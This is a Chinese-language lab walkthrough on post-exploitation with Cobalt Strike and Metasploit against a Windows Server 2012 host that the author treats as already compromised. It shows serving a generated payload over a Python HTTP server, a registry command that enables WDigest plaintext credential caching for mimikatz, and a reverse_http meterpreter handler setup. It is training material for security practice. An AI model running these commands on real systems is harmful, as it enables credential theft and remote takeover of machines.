目录
2、选择刚才创建好的监听器,勾选x64,其他默认即可,然后点击Generate
- ./teamserver 192.168.208.128 123456
- IP地址 密码
./cs.sh
注:这里的实验,我是当win2012已经被拿下,来进行实验
注:启动http服务时,要在保存脚本的文件夹下启动,若不是,则win2012无法下载;win2012关闭防火墙,否则也无法下载。
python3 -m http.server 9999
注:这里显示两次,是因为运行点了两次。正常只有一次就行。
- sleep 0 //正常cs有个命令沉睡,这里是关闭cs的命令沉睡
- shell ipconfig //查看win2012的IP地址
shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f
原理:
windows输入密码的进程是winlogon.exe,然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中,ntlmv2加密后发一份给sma文件,mimikatz就抓内存中的明文。
由于微软将windows补丁之后,就导致windows将不会再把明文存储在内存中,这就代表使用mimikatz将无法再抓取到明文密码
要想抓取到明文密码我可以通过修改注册表中的数据
- msfconsole
-
- use exploit/multi/handler
-
- set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)
-
- set lhost 本机ip
-
- set lport 自己的端口号
-
- run
注:这里选之前操作的会话,权限才能传递成功,否则可能会失败。